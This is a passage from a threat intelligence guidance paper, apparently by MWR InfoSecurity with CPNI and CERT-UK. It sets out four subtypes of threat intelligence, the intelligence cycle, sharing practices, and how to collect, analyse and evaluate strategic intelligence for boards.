can vary greatly, often with almost no 
commonality or comparability among the various threat intelligence offerings. Prices for similarly positioned (but very different) 
offerings can also vary wildly, with 100-fold 
variations in product pricing from different providers – even when the products claim  to meet the same need.
The products and services sold as threat 
intelligence can vary enormously in their scope, usability, aims and content. For  
example, at a high level, some products 
come in the form of prose that explains developments in a particular area, while at a lower level, others might be a stream of XML-formatted indicators of compromise, 
such as IP addresses or binary hashes.
Even within similarly placed sources, such 
as feeds of indicators of compromise, there is very little overlap between competing 
products. Recent research suggests that in 
three popular feeds of flagged IP addresses, containing more than 20,000 IP addresses  in total, there was as little as a 1% overlap
2. 
This suggests that either attackers are  using huge numbers of IP addresses and 
even well-known feeds see only a small 
part of the picture, or only a minority of IP addresses contained within the feeds are  of intelligence value. It’s likely that the  
truth is a mixture of both explanations.
As market demand for threat  
intelligence grows, with a large number  of organisations either interested in  
products or actively building programmes, 
some vendors are  offering existing products – or subtly  reworked versions of existing products –  as ‘threat intelligence’. At the more cynical end of the spectrum, it’s been 
suggested that threat intelligence is at a 
threshold where it could become either  useful, or simply antivirus signatures by another name... and at a higher price
3.Figure 2:
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk6/36STRATEGIC
TECHNICALTACTICAL
OPERATIONALHigh-level
information on
changing risk
The boardAttacker 
methodologies, tools and tactics Architects and sysadmins
Details of a specific
incoming attack
DefendersIndicators of specific malware SOC staff / IRLong-term Use Short-term / Immediate Use
Low Level High LevelSubtypes of Threat Intelligence
Any information about threats that  
could inform decisions is arguably threat 
intelligence. This broad definition  obviously covers a huge variety of sources and information, from watching a TV news 
report about how attackers are exploiting  
a flaw, to a quiet drink with a friend at a  competing organisation who mentions  they are seeing more phishing with PDF documents. Organisations that make good 
use of these relatively abstract sources will 
often be more resilient and aware of threats than organisations that make poor use of expensive products.With so many different sources falling into the category of threat intelligence, it can  be useful to have subdivisions to focus  
effort and better manage the information.  
For example, a prose report of national  activity is not comparable to an IP address and cannot be actioned in the same way.
Identifying subtypes of threat intelligence 
can be based on who consumes the  intelligence and what it aims to achieve.  
We propose a model that breaks down  
threat intelligence into four distinct  categories based on consumption.  Each area is discussed in depth in later  
sections, but the following is a summary  
of the four categories:Strategic Threat Intelligence  is high-level 
information, consumed at board level or by other senior decision-makers. It is unlikely 
to be technical and can cover such things as 
the financial impact of cyber activity, attack trends, and areas that might impact on high-level business decisions. An example 
would be a report indicating that a particular 
government is believed to hack into foreign companies who have direct competitors within their own nation, hence a board  might consider this fact when weighing  
up the benefits and risks of entering that 
competitive marketplace, and to help  them allocate effort and budget to mitigate  the expected attacks. Strategic threat  
intelligence is almost exclusively in the  
form of prose, such as reports, briefings  or conversations. 
Operational Threat Intelligence  is  
information about specific impending 
attacks against the organisation and is initially consumed by higher-level security staff, such as security managers or heads of incident response. Any organisation would 
dearly love to have true operational threat 
intelligence, i.e. to know which groups are going to attack them, when and how – but such intelligence is very rare. In the majority 
of cases, only a government will have the 
sort of access to attack groups and their infrastructure necessary to collect this  type of intelligence. For nation-state threats, it simply isn’t possible for a private entity  
to legally gain access to the relevant  
communication channels and hence good operational threat intelligence won’t be an option for many. There are cases, however, 
where operational intelligence might be 
available, such as when an organisation is targeted by more public actors, including hacktivists. It is advisable for organisations to focus on these cases, where details of 
attacks can be found from open source  
intelligence or providers with access to closed chat forums. Another form of  
operational threat intelligence that might be 
Figure 3: Subtypes of threat intelligence
7/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukavailable is that derived from activity-based 
attacks: where specific activities or events in the real world result in attacks in the cyber 
domain. In such instances, future attacks 
can sometimes be predicted following certain events. This linking of attacks to real-world events is common practice in 
physical security but less commonly seen  
in cyber security.
Tactical Threat Intelligence  is often 
referred to as Tactics, Techniques, and 
Procedures (TTPs) and is information about how threat actors are conducting attacks. Tactical threat intelligence is consumed  
by defenders and incident responders to 
ensure that their defences, alerting and investigation are prepared for current tactics. For example, the fact that attackers are using tools (often Mimikatz derivatives) 
to obtain cleartext credentials and then 
replaying those credentials through PsExec is tactical intelligence that could prompt defenders to change policy and prevent interactive logins by admins, and to ensure logging will capture the use of PsExec
4. 
Tactical threat intelligence is often gained by reading white papers or the technical 
press, communicating with peers in other 
organisations to learn what they’re seeing attackers do, or purchasing from a provider of such intelligence.
Technical Threat Intelligence  is  
information (or, more often, data) that is  
normally consumed through technical 
means. An example would be a feed of IP 
addresses suspected of being malicious or implicated as command and control servers. Technical threat intelligence often has a 
short lifetime as attackers can easily change 
IP addresses or modify MD5 sums, hence the need to consume such intelligence automatically. Technical threat intelligence typically feeds the investigative or  monitoring functions of a business, by –  
for example – blocking attempted  
connections to suspect servers.One Source, Multiple Intelligence Types
While a single source tends to provide  
intelligence of only one specific type –  
for example, a data feed that is useful only as technical threat intelligence – many useful sources can provide multiple types 
of intelligence that can be analysed and 
turned into different products for effective consumption. 
An increasingly common practice is for 
private organisations to publish white papers on attack groups or campaigns. A single document can contain almost all types  
of intelligence. For example, the fact  
that hackers believed to be working for  a particular nation state have been  attacking a specific industry sector is  strategic intelligence. The details of their 
modus operandi, tooling and capabilities  
is tactical intelligence and can inform  defences, while the list of MD5/SHA-1  hashes of binaries that often appears in  appendices is technical intelligence that  can be used for investigation. 
Few, if any, of these reports contain  
operational threat intelligence as, by the 
definition given in this paper, the report 
would need to contain details of a specific impending attack. 
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk8/36The Threat Intelligence Cycle
An effective threat intelligence (TI)  
programme will have a number of areas of 
focus. The breakdown of threat intelligence into specific functions is more scalable, as staff are likely to be better skilled at specific 
aspects of intelligence. Individual parts of 
the cycle can be focused on and developed, while it will be easier to track insufficient results from the programme to  specific weaknesses. 
An oft-quoted model is the ‘intelligence  
cycle’. The steps in the cycle are as follows
5.How Do You Build and Evaluate a  
Threat Intelligence Programme?
Requirements
Collection Evaluation
ProductionAnalysisRequirements:  A step that is often  
overlooked is also the key to a successful 
programme. Decision-makers need to 
identify what they specifically want to know 
and what the TI programme should be telling them. For example, a requirement might be: “Inform us of all publically known, widely 
exploited vulnerabilities within one day of 
them becoming known.” This can also be referred to as ‘tasking’. For example, if a company were considering a partnership with an organisation from country X, the  
TI team could be tasked with understanding 
whether country X is known to abuse such relationships, and what technical tools  and tactics have been used to do so.  
Requirements can also be more demanding 
of TI teams, such as, “Obtain details and samples of the majority of criminal outfits’ remote access toolkits for our forensic teams.” TI teams need to work with  
decision-makers to agree on requirements 
that are not only feasible but, crucially,  that will supply products on which the  organisation will be able to act. 
Collection:  The step that can dominate 
much of a TI budget is collecting the  
information or data that is expected,  once analysed, to fulfil the requirements. 
The information can come from a large 
variety of sources, such as news feeds, paid-for services or feeds, forums, white papers, or even human sources. Almost all paid-for threat intelligence from vendors 
comes under this category and will require 
some form of analysis. Understanding which sources are likely to produce the desired information, to be reliable and to provide 
information that can be consumed in a 
timely manner, is not a trivial process, and it is far better to ‘pour a measure of spirits than to try sipping from a fire hose’. Collection for specific subtypes of intelligence will be 
discussed in later sections.The value of collecting from  
human sources should not be  underestimated. In traditional  
intelligence, covert sources are  
normally tapped to provide intelligence, but in threat intelligence the focus  is on sharing information through  
relationships with peers in other  
companies in the same (or  potentially other) market sectors. The ability to have a quiet catch-up with a peer and ask whether they saw 
increased activity once they became 
involved with country X can provide highly useful information. However, it’s important to do so in a way that doesn’t 
tip off a competitor to unreleased 
business plans. Trusted forums and relationships can help an organisation share information safely – and also help others to trust the information received.
Analysis:  Turning data into information  
that can be actioned often requires  analysis
6. In some cases, analysis will be  
relatively simple, e.g. parsing a feed into a firewall deny-and-alert ruleset. In other  
cases it will require extracting the relevant 
information from a larger work, such as a report, and understanding which elements apply to the organisation’s assets. An  
important role for the analyst is to look 
for opportunities to create new types of intelligence through synthesis from current intelligence. For example, an analyst might spend time reading through white papers to 
extract indicators of compromise, and  
also identifying operational intelligence  
 that can be given to network defenders.  Or, after reading such papers and other 
sources, the analyst might identify  
trends that can be drawn together into  a strategic intelligence product for  higher management. An interplay between collection and analysis often occurs, where 
analysts realise that the collection is not 
producing the required raw material; or  perhaps that different information needs  to be collected for appropriate analysis. 
Collection can then be altered and  
analysis continued. 
9/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukProduction / Dissemination: In this stage,  
an intelligence ‘product’ is created and  disseminated to the customers (senior  
executive officers, network architects,  
defenders, etc.). The product will vary,  depending on the subtype of intelligence and the customer. For example, it might 
require a three-line report to the board,  
a white paper to defenders, or simply an approved rule added to defence hardware.
Evaluation: Another frequently neglected 
phase of threat intelligence (if modelled on traditional intelligence) is the evaluation  of the intelligence product to ensure it 
meets the original requirements. If the 
requirements have been met, then the product can further feed the requirements to help develop new, deeper requirements that build upon the intelligence product – 
and the intelligence cycle can repeat. If the 
produced threat intelligence does not meet requirements, then it suggests a failure at some point, and the cycle model can be used to establish where the failure occurred. Were the requirements unrealistic? Did the collection use the wrong sources? Was the data contained within the sources but not drawn out during analysis, or did the final 
product not contain the intelligence gained?
A Modified TI Functional Flow
In 1996, the United States Senate Select 
Committee on Intelligence published a study on how the intelligence community might look in the 21st Century if it were  
redesigned from scratch. This study  
proposed a functional flow for intelligence 
that can be used as the basis for a mature, 
scalable TI programme, as shown in figure 4.
Although similar to the threat intelligence 
cycle, there are some subtle differences.  The functional flow differentiates between intelligence management and execution, 
and this distinction can be useful when 
building and managing an organisation’s teams. Requirements remain the  cornerstone and a good entry point into 
the cycle. Requirements drive collection 
and analysis management, with resources balanced between them as necessary – and open to changes as the cycle progresses. Collection feeds analysis, but analysis also 
informs and modifies collection to  
ensure the necessary data is gathered.  The products are then evaluated against  the requirements, which helps to set the  
requirements for the next cycle.
An important departure from the traditional 
threat intelligence cycle is that resources 
can be used to develop systems and  
capabilities of potential use to both  collection and analysis, based on advice from the collection and analysis functions. 
Applied to a TI programme, this might mean 
that new feeds are required, or new systems to parse and process the feeds, or perhaps there is a need to develop analytical engines. As an example, analysts might raise the 
fact that some elements of the information 
they are collecting are not currently being analysed and acted upon. It might be wise to modify the requirements to include that information, or the issue could simply be that analysts lack sufficient staff or systems 
to analyse the collected data effectively. 
REQUIREMENTS RESOURCE MANAGEMENT
COLLECTION MANAGEMENT PRODUCTION MANAGEMENTIC 
MANAGEMENT
FUNCTIONS
IC 
EXECUTION
FUNCTIONSEVALUATION
ANALYSISCOLLECTION
—SYSTEMS
DEVELOPMENT
OPEN SOURCE
HUMINT
SIGINT
IMINT
MASINT
Adapted from: http:/ /www.gpo.gov/fdsys/pkg/GPO-IC21/html/figure1a.gifFigure 4: A modified threat intelligence functional flow
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk10/36How to Build a Threat Intelligence  
Programme
As previously stated, it’s crucial that threat 
intelligence is ‘requirements focused’, with the requirements phase of the threat intelligence flow defining the questions that 
need to be answered. Since the definition 
of both traditional and threat intelligence is information that can be acted upon, it’s only logical that organisations should also ensure they will be able to act on the answers they 
seek. Resources and tasking will be required 
by both the threat intelligence function  and whoever intends to act on the resulting intelligence. There is little point, for  
example, in obtaining a list of MD5/SHA-1 
hashes if the organisation has no ability to search for binaries with those hashes on  its network or hosts.
Once requirements have been decided, the 
next step is to identify the sources from which information and data will be collected, along with the analysis necessary to produce actionable threat intelligence. 
How Not to Build a Threat Intelligence 
Programme
The majority of TI programmes that are  
failing to provide meaningful intelligence and business value have factors in  
common when it comes to how they  
were built. Typically, senior management decided that a threat intelligence team was necessary, a decision based on interactions with peers, writings in the field or even  
vendor pitches. Rather than the  
requirements driving the establishment  
of teams, the perceived need simply to  have a team drove the whole process.  
It’s not unknown for senior staff to muse, 
“We don’t know what threat intelligence is, but we know we need it.” 
In the absence of clearly defined  
requirements, these teams, once created, search for something to offer as threat  intelligence, and often end up simply consuming whatever vendors are selling. 
This can be defined as ‘collection-focused threat intelligence’ that seeks to consume 
feeds – or whatever is in vogue – in the hope of extracting meaning, and it rarely offers 
significant benefits to the organisation. 
Official or Unofficial?
Many organisations have, or are currently 
building, dedicated threat intelligence teams with full-time staff members and  a budget for hardware and software to  
manage the intelligence feeds. However, 
other organisations are benefiting from 
threat intelligence without any dedicated 
staff or specific budget and, in some cases, might not even be aware that they are  effectively ‘doing’ threat intelligence.
Returning to this work’s definition of threat 
intelligence as information on threats that  
is actionable, organisations can obtain and 
act on information without any full-time staff dedicated solely to that purpose.  A number of organisations have engaged 
staff members who, by merit of their reading 
around the subject and staying abreast  of developments in security, as well as  participating in forums such as CiSP
7, have  
a well-developed understanding of the threats to their business and developments 
in attacker methodology. In small  
organisations, these individuals are often the ones who directly act on the information – by changing group policy to prevent a  
certain type of attack, or adding a block  
rule to a firewall. Although there is no  specific process or team, they are setting  requirements (they seek awareness of threats to their business), collecting  
information (reading blogs, twitter, forums, 
etc.), analysing information (realising they are running services that are vulnerable)  and acting on that information (patching 
services). A subconscious evaluation then 
occurs, where they realise that certain  blogs are better than others or certain companies produce reports that are more directly useful. 
In cases where unofficial threat intelligence 
is already taking place in the business, staff 
members should be encouraged.  The further development of threat  
intelligence should focus on supporting such efforts, with management identifying the areas in which to put resources  
(including both money and allocated time) 
to develop the function further.
Where organisations desire an official threat 
intelligence function, it is important to staff it with team members who have the right mentality to seek out the information, as well as a level of technical and business 
understanding to be able to draw the right 
conclusions – and then apply their findings to the business’s assets. Some aspects of the threat intelligence team’s work, such 
as certain types of collection, can also be a 
good place to start more junior members on their security careers. It will expose young employees to interesting aspects of the team’s activities, provide experience of 
distilling technical information into products 
for more senior audiences, and utilise their probable familiarity with such sources as twitter, blogs and white papers.
Ex-Bonds or Joe Public? 
A common debate among organisations 
interviewed for this work was the merit 
of staffing threat intelligence teams with people who have traditional intelli -
gence experience. Opinions were divid -
ed, with some organisations believing it to be an important factor in the success of the team, and others not thinking it particularly necessary. Some aspects of building a threat intelligence team 
or function in the business can benefit 
from an understanding of traditional intelligence and reporting; however, as with most recruitment, it probably 
comes down to the individual’s specific 
skills and experience, rather than just where they have worked.
11/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukNeed to Share
In the world of traditional intelligence,  
‘Need to Know’ is a well-established security principle. By restricting information to 
those who genuinely need it, you reduce 
the data stolen when an individual’s access (or a specific computer) is compromised. In today’s world of effective and motivated 
attackers, often with nation-state funding 
and resourcing, such security principles are highly important when it comes to limiting information loss. 
However, in the world of threat intelligence 
there is an equally important ‘Need to Share’ principle. All subtypes of threat intelligence, 
if shared, will aid other organisations in 
defending against attacks. By establishing sharing communities and relationships, everyone can benefit from each others’ intelligence. A company can be damaged 
when a rival business’s computers are 
hacked, since the information stolen can often be used against other organisations in the same sector; and if a nation state is keen to support its own companies by such means, the impact of information theft  
will end up hurting all companies in the  
competing UK market. 
Furthermore, many attacks do not target  
a single organisation in isolation, but  rather target a number of organisations –  often in the same sector – and hence  discussion and understanding of attacks 
can be valuable to all related businesses. 
As entire communities are attacked, those communities need to defend: the aim is to raise the bar and constantly increase the 
cost to attackers.How to Share
The various types of threat intelligence  
will need to be shared in different ways8 
(more detailed advice is given later in this 
document). However, effective sharing 
requires trust, as the shared information 
might be sensitive – for example, revealing that you have been attacked. Trust is also important on another level, as it is generally 
unwise to allow threat actors to learn what 
you know about them, lest they change their methods. The attackers might have realised that their tools aren’t ‘phoning home’, but this doesn’t mean they know how you’re 
managing to stop them, and hence what 
they need to change.
For these reasons, closed and trusted  
groups can enable deeper sharing than would otherwise be possible. The groups  can take many forms: for example, there  are information exchanges for different industries run by parts of the UK  
Government and there is the online  
CiSP portal, which ensures that members  are legitimate individuals at approved  organisations. Various industry sectors  have groups that share information,  
sometimes via a forum, sometimes simply 
by means of an email list. There are also  less official groups, such as those set up on general online forums. The more a group 
can trust its members and the security  
of information within the group, the  more effective the sharing tends to be.  Organisations are recommended to seek  out such groups and, if none exist, to  
consider creating them. Supporting these 
groups by encouraging staff to contribute  is also important.Some of the most useful sharing,  
however, can come from trusted personal 
relationships with similarly placed people at other organisations. This is obviously not scalable and it can take time to build the necessary trust, while the sharing needs  
to be mutually beneficial in order to  
succeed. Nevertheless, the value of such relationships should not be underestimated, and should even be directly supported.  
Attendance at networking groups and  
information exchanges can prove useful,  but there are also small ways to help develop these productive relationships – such as allowing threat intelligence team members 
to charge meals out with counterparts as a 
legitimate business expense.
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk12/36What Prevents Sharing?
There are two common reasons cited  
by organisations for not sharing threat 
information with others. One is the belief that they have nothing worth sharing; and the second is that their competitors might 
use the information against them. In some 
sectors, even a rumour of compromise  can influence purchasing decisions or  market valuations. 
The concern about a lack of information  
to share might be valid if the organisation is fortunate enough not to be under  
attack. However, this is an increasingly rare  
situation and it’s likely that, if looked for, there would at least be signs of attempted attack to share. Signs of attempted  compromise can be particularly useful 
threat intelligence, as even if an attacker 
didn’t – for example – successfully  compromise one organisation through  SQL injection, it might well be luckier with another in the same market sector. It can therefore be incredibly useful to share  
instances where defences have proved  
successful, as others can consider  implementing those same defences.
Concerns about the risk of revealing a  
weakness to one’s competitors is natural and it would be wise for companies to ensure they do not reveal information that could 
have a negative business impact unless the 
benefits are clear. Ideally, trust needs to be built up, either within groups or with specific individuals, to engender confidence.  
An organisation needs to feel confident  
that a competitor’s defenders will act on the information given without revealing anything sensitive that might be misused by their colleagues – for example, the sales 
force. The continued benefits of playing by the rules should outweigh the single- 
instance benefit of betraying trust. 
Organisations also need to be able to  
trust their own employees involved in  the information-sharing arrangements.  
The ideal employees for such activities  are individuals with a high degree of  personal integrity and sufficient social  skills to avoid the risk of oversharing;  plus, of course, it’s worthwhile selecting  
employees who are unlikely to leave the 
organisation in the near future.
In some industries, even the faintest whiff  
of suspicion that a company has been compromised is likely to influence buyers to go elsewhere. In these cases, organisations might do well to use trusted third parties to anonymise and distribute the information, 
so that communal benefit can be gained 
with minimal reputational risk. CERT-UK is able to act as a third party, as are private sector organisations – for example,  companies involved in the Cyber Incident 
Response (CIR) service
9.Some organisations include vulnerability assessment within the scope of the threat 
intelligence function. The threat intelligence function might even have grown out of the team that manages vulnerabilities. This can make sense as, in both cases, a team is 
tasked with finding information on the wider 
internet, analysing the information to decide whether it applies to the business, and then acting upon it. Organisations can even  
be tempted to regard a vulnerability  
notification as ‘threat intelligence’.
The distinction between vulnerability  
information and threat intelligence is  
subtle. That a vulnerability exists in a  product used by the organisation is  important information, and requires action, 
but it’s not information about a particular 
threat. However, information that a  particular attack group is exploiting a known vulnerability, such as was seen shortly after the Heartbleed security bug was released
10,  
is tactical threat intelligence. 
Whether or not the same team handles 
vulnerability assessment and threat  intelligence is up to the individual  organisation, but care should be taken to avoid blurring a team’s aims to the detriment 
of its function. Vulnerability assessment 
should be an on-going, business-as-usual function to detect known vulnerabilities that could have arisen through missed patching 
or misconfiguration. Threat intelligence 
should be responsive to evolving  requirements – with clear tasking. 
Interaction between threat intelligence and 
vulnerability assessment is often desirable. 
If, for example, the threat intelligence team identifies that a particular vulnerability is  being actively exploited, especially when there are indications that exploitation is  
occurring within the organisation’s own 
industry sector, it should trigger an out- of-band vulnerability assessment to ensure that any such attack on the organisation 
will fail. In this example, monitoring teams 
should be advised to look for indications  of exploit attempts, as this could reveal  an attacker’s intentions – highly useful  information.Vulnerability Assessment 
and Threat Intelligence
13/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukThe four subtypes of threat intelligence 
proposed by this paper are very different  in terms of their collection, analysis and  
consumption. This section will address  
each in turn, providing guidance on how  to collect, use and share the intelligence  to best effect.
Definition
Strategic threat intelligence is consumed by 
high-level strategists within an organisation, 
typically the board or those who report to the board. Its purpose is to help strategists understand current risks, and to identify  
further risks of which they are as yet  
unaware. It deals in such high-level concepts as risk and likelihoods, rather than technical aspects; and it is used by the board to  guide strategic business decisions and  
to understand the impact of the decisions 
that are made.
The intelligence is often in the form of  
prose, such as reports or briefings – either at meetings or one-to-one with senior management and board members. It has a high-level and business focus that is used  
to guide strategy.
How to Set Requirements
C-level executives (CEO, CFO, CIO, etc.) and 
the board require a level of understanding as to which decisions might be linked to cyber risks. In lieu of this understanding, threat intelligence team members need to ensure 
that they are themselves aware of the sorts 
of decisions being made, and proactively advise senior management and the board. 
Decisions that might have cyber risk  
implications should be used for setting requirements. These decisions could be  Collecting, Using  
and Sharing
Strategic Threat Intelligencerelated to adversaries, such as when  
entering foreign markets, partnering or supporting ideological groups, making 
ideological statements / taking ideological 
positions, purchasing or being purchased by foreign organisations, or setting up foreign offices. Alternatively, the decisions 
might be related to information exposure, 
such as strategic directions that affect how information is stored and used within the organisation – for example, outsourcing an IT function. It is important for boards to 
understand that such decisions can affect 
risk. The threat intelligence function can then be tasked with finding answers to help the decision-making process.
Setting appropriate requirements is  
crucial to a good outcome in all forms of intelligence, but this is particularly true  
of strategic intelligence. If the threat  
intelligence team is tasked with the  following: “We are going into business in  this new country; tell us their capability  and which groups will attack us, and how,”  it will not result in a useful intelligence  
product. The requirement blends a  
number of different intelligence types  and, significantly, it is simply not possible for a non-government entity to legally 
gather much of the operational information 
required to discover whether groups would attack. To do so would probably require communications interception and human sources within the attack teams. There are 
similar issues when it comes to identifying 
an attack group’s capability and further challenges in deciding what the information actually means to the board.
A better requirement would be, “We are  
going into business in this new country. Do we believe that is likely to result in 
attacks, what are the typical outcomes of 
those attacks, and what would be the cost or effort required to appropriately defend against such attacks, should we choose to?” A requirement phrased in such a  way allows a threat intelligence team to 
prepare realistic advice based on what  can be ascertained, rather than seeking  
difficult or impossible-to-obtain answers, with the probable result of purchasing  
suspect and hard-to-corroborate  
information from a provider.
Those involved in threat intelligence will 
need to work with the intended recipient  to ‘drill down’ on what, exactly, they need to know – and with how much confidence – before progressing to the next stage of  
the TI cycle. 
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk14/36How to Collect
As strategic threat intelligence is high-level, 
the majority of the collection sources will be 
high-level as well. They are likely to involve:
High-Level Geopolitical Assessment 
Trends in country strategies, ambitions, 
priorities and other high-level information 
can help inform strategic analysis. Is usually coupled (at analysis stage) with observations of malware or attacks thought to be  related to the country, to create a picture  
of cyber activities.
Information to feed analysis will therefore 
come from high-level sources. These might include an analysis of policy releases by 
nations or groups of interest, news stories 
in domestic and foreign press, and news stories in subject-specific press, such as financial papers. Articles published in  
journals by high-ranking persons in the nation or group of interest can also provide useful indications of intent or capability. 
Much of the information needed for analysis 
can be collected from what is commonly called open source intelligence (OSINT), in other words searching publically available or 
‘open’ sources. It has been reported that in 
mixed-source reports (i.e. information from a number of different sources, including both OSINT and secret sources), open source intelligence regularly provides  
80% of the content
11. This can be a highly 
rewarding area of collection and should 
be actively pursued12. For deeper insight, 
organisations are advised to ensure they are not limiting searches to their own language 
or with a bias towards their own language
13. 
Using search engines from the nation of 
interest and the increasingly powerful 
translation engines provided by the likes 
of Google and Microsoft Bing can enable searching and collection of news stories, articles, policy, etc. directly from the nation or foreign group of interest. Even the foreign language versions of Wikipedia can contain 
far more relevant information than does the 
English language version.Staring Into the Abyss
Organisations should be aware of the 
searches and investigation techniques 
that can be detected by an attacker,  as particularly astute attackers might well be looking for indications that  
their activities have triggered an  
investigation. For example, attackers can monitor VirusTotal (www.virustotal.com) to ascertain when malware they have created has been uploaded –  
suggesting that someone is  
investigating that malware
14. Even  
visiting a website can tip off the owners that someone has visited a certain  
page, and it’s not unknown for  
interesting-sounding pages to be  created, simply to provide an alert  when they are accessed. Technical  
staff who understand privacy and  
digital footprints are best placed to create guidance for acceptable (and  unacceptable) investigation techniques, with the aim of helping to train  
investigators.
Collection (and analysis) of strategic 
information can be challenging and it does 
require a socio-political mindset rather  
than a technical one. With such a huge 
number of sources available, identifying those that are useful – and reliable – can be 
problematic. How do you find the military 
journal in which a senior commander once published an article on what he saw as  the future of cyber-enabled conflict?  How do you then establish whether that 
commander’s viewpoint represents a  
trend or intention, or just one man’s  dream? Hence many organisations prefer  to purchase analysis from strategic  
intelligence providers. 
These providers attempt general collection 
and analysis to create products they feel will be useful to a large proportion of their 
clients. However, since they are producing 
a relatively broad product, the purchased analysis must be treated by an organisation as collected information (i.e. not as analysis), which is then itself analysed by the  organisation’s own threat intelligence team. Another issue for analysts to consider is  the reliability of the information. Strategic 
intelligence is hard to ‘do’ well and some 
vendors have not been above selling  unreliable or poorly verified intelligence – and then citing the need to protect their 
sources if a client challenges the collection 
or analysis. Careful analysis of these  products is therefore important.
Security Industry White Papers
A major source of information to help  
inform strategic analysis comes in the form 
of white papers and blog posts covering particular attack campaigns or threat actors. An increasing number of such papers are 
being released and the information can help 
to build a picture of attack groups and their targets. Reports typically lend themselves  to tactical and technical analysis, yet can also contribute to strategic intelligence  
and are therefore worth including in the 
collection process. 
Human Contacts
Human contacts can be extremely useful 
when collecting for strategic intelligence. 
Contacts at similar organisations, or  organisations in other sectors that have been in similar situations, can provide  valuable information on attacks and threats. 
This can be seen as the receiving side of 
‘Need to Share’.
The depth of information provided by 
contacts will no doubt be proportional to  
the level of trust in that relationship, and  
so these relationships are worth building  and maintaining (see ‘Need to Share’),  even when no information is currently  
being sought. Information should be 
treated sensitively and, unless there are specific reasons to do so, it is often better 
not to attribute the information received 
to particular individuals. If it is necessary to identify the source, then that information should itself be reliably protected. This is important in engendering bilateral trust, so 
that individuals will feel inclined to help your 
threat intelligence team build a picture of the threats.
15/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukPeers, Not Agents
Human sources are a traditional  
focus of intelligence, and are often 
considered when mapping intelligence theory onto threat intelligence.  However, it’s important for  
organisations to take care when using 
human sources, and not be drawn into ‘playing spies’. Attempting to cultivate either human sources in an attack group, or those who can inform on  
an attack group, is – for a private  
organisation – ethically dubious,  to say the least. It also risks interfering with existing investigations.  
Organisations are strongly advised 
instead to focus on human sources in the form of peers, friends and contacts in relevant organisations, with whom it’s possible to build mutually beneficial 
sharing relationships.
How to Analyse
Strategic analysis is a long-established 
but complex field – and it can be a highly 
challenging one, since it’s rare to work with absolutes. Instead, it’s more usual to deal with trends, observations and perceived  
intentions
15. Analysis for strategic  
intelligence purposes requires more  
expertise than in other areas of intelligence 
and probably a wider range of collected 
information, of varying levels of relevance and reliability. 
Analysis and collection are likely to be  
tightly linked, with lines of inquiry and  trends identified and then tested by  collecting new information. 
Organisations will often hire people with 
expertise in traditional intelligence or socio-political analysis and then teach them the cyber components necessary to 
perform effective subject-specific analysis. 
Alternatively, technical staff in the threat intelligence team can be trained in  analysis; however, this latter approach  
tends to require a great deal of reading  
and understanding of the sociological  and political background. Meta-analysis is often a useful component 
of strategic intelligence, whereby results 
from a range of analyses are combined and reconsidered in an attempt to yield new intelligence. This can be particularly useful with, for example, technical white papers 
that come through the team. By analysing 
the white papers, trends might be identified, such as a particular piece of malware that  is increasing in complexity and code quality 
with each iteration – suggesting active 
investment and development by the  responsible group. In this case,  developments in other areas of the group’s capability are likely, and potentially in its 
target selection, and collection can seek 
evidence to support or disprove this theory. 
Attribution in cyber attacks is often  
difficult
16. Hence, while they can sometimes 
prove useful, any stated attributions in a  report should be regarded with some  
caution. The reported range of industries  
to be targeted should also be treated  cautiously, unless the methods for  ascertaining victims is open to scrutiny.  On multiple occasions, MWR InfoSecurity has investigated attacks on clients that were 
very likely to be part of campaigns reported 
by others, yet the victim’s industry did not appear anywhere on the lists of targeted  industries. This suggests that, in many  
cases, reports of threat actor activity have  
a limited view when it comes to the extent  of the campaign. Production and Use
The threat intelligence team should be  
working to tight requirements in terms of 
what to produce. Strategic intelligence is best used by high-level decision-makers, who will be consuming a great deal of 
information as part of their decision-making 
process, hence the product will generally need to be short and concise. In some cases, it might be no more than a couple of lines.
Informal strategic intelligence requests 
should also be expected and supported. Once the team has become experienced, 
it is more likely to be asked for analysis and 
comment informally – either by the board or by the security function of the organisation. In such cases, the product of the intelligence might simply be an email.
Products are typically focused on business 
impact and risk, while a discussion of  technical details is best avoided as it’s rarely useful to the board. Where the accuracy  
of the information can’t be guaranteed,  
this should be indicated to the product’s consumer and, where appropriate, a  confidence level in the information given. 
Consumers will also need to understand 
what is, and isn’t, a realistic request or task.
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk16/36Confidence is Key
In intelligence analysis there will rarely 
be certainty. In many cases, analysis 
will have to focus on a small number of sources, or even a single source of potentially questionable quality. Hence 
communicating the confidence of a 
statement is of key importance, with an agreed language consistently used by those producing threat intelligence reports – and understood by those 
reading it. Organisations are advised  
to maintain an internal document that explains exact definitions of such terms as “we know”, “we suspect”, “we  
believe”, “high possibility”, “may”, and 
so on. Staff with previous experience  in traditional intelligence are likely to have an advantage in helping to design such vocabularies. As an example,  
page 6 of the 2014 ‘Targeting US  
Technologies’ report by the US  Defense Security Service (DSS)
17 gives 
descriptions of how confidences are derived before using the terms.  
For “High Confidence” statements, 
phrases such as “well-corroborated information from proven sources”, “minimal assumptions”, or “strong 
logical inferences” generally indicate 
that the DSS based its judgements on high-quality information, and/or the nature of the issue made it possible to render a solid judgement.How to Evaluate
Strategic intelligence should be  
evaluated as to how well it supports  
senior decision-makers: is it accurate,  impactful and timely? 
Accuracy can be difficult to assess in  
absolute terms, as we might never fully  understand a remote situation, but it’s  usually possible to assess a product in terms 
of the team’s stated belief in its accuracy.  
